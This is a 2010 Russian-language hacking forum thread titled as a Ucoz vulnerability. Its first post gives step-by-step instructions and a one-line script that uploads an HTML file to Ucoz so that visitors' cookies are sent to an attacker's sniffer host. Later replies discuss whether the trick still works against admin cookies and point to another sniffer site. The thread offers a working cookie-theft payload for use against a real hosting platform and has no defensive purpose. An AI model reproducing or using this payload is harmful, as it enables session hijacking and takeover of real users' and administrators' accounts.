Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   А вот и долгожданный Ucoz (https://forum.antichat.xyz/showthread.php?t=187924)

Dr..VATSON 18.03.2010 01:50
А вот и долгожданный Ucoz
 
Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки
Код:
<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>
2) Загружаем наш html файлик через "Обзор"

Смотрим скрин

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин

Ну вот и всё...

general.fox 26.03.2010 09:56
На UcoZе куки Админов привязаны к IP.

general.fox 26.03.2010 09:58
Хотя может я ошибаюсь...

Koder45ru 04.04.2010 17:16
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..

Rejiser 05.04.2010 23:03
Цитата:
Сообщение от Koder45ru
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
не подскажешь где читал?)

sparrow3000 06.04.2010 07:52
Цитата:
Сообщение от Koder45ru
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
если про бесцветный смайлик со скриптом то это не пашет уже :D

[Feldmarschall] 09.04.2010 05:14
не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде

NeoX 14.05.2010 12:06
еще актуально?

niva622 16.05.2010 22:56
еще актуально, но на некоторых сайтах запрещено добавлять html файлы..

<Maxwell> 26.05.2010 16:48
Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.


Время: 20:41
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице